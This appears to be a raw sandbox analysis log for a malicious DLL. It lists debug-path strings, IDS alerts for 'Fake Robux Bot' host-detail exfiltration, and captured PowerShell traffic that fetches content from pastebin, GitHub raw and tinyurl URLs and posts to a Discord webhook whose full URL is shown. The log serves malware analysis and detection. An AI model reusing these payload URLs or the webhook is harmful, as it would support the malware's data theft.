Source: Binary string: System.Management.Automation.pdbl source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89) source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbr source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2195588775.00000148CB080000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb9 source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdbi source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb? source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000007.00000002.1750975214.00000193E88BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb+Z source: powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B75C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbM source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbT source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb^A source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000018.00000002.2408826051.000001B769F02000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb[ source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{4 source: powershell.exe, 00000009.00000002.2197283163.00000148CB32F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB30D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: &C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbG source: powershell.exe, 0000000D.00000002.1783891772.000002476FA01000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ment.Automation.pdb! source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbM source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089u source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 56ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb!4Z source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb"fru source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52050 -> 162.159.128.233:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52049 -> 162.159.128.233:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52104 -> 162.159.128.233:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52102 -> 162.159.128.233:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52203 -> 162.159.128.233:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:52206 -> 162.159.128.233:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: tinyurl.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000830x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKHpiolfSBMOmhMVHMCKAAGkZ4L%2F6xtf%2FVEDsRBGlsW1e3%2Bnbj6rsjP5fip6jl%2BVRZLSXNeuydXw5a5zIi2A%2Fm4kMuUdiHesM2Z0v802QXta%2BC2YBtzrGoGQ7tKZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=.tK.8_bM.IlqYQCskpMyBWYMJqLfcyu08rolf4Vi0ak-1729000828721-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3055eabfe8463e-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1729000830x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWkylGAmxKzDKJkj%2B7wLOdgBOts%2FMJuy3G3m0RU5XfXU4S9YAVZewPD4icofBcQK3HU9Py%2BRuuGsRw71Z5d%2F1Giz%2B1y4cNwI13zAbbcx4Svg84Tzzoax%2FDCGxOc3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=xSJuK64XEUQZUWANV0z1KgUnC_eADyp7hPkdEdtJkUU-1729000828724-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3055ead8443ad3-DFW
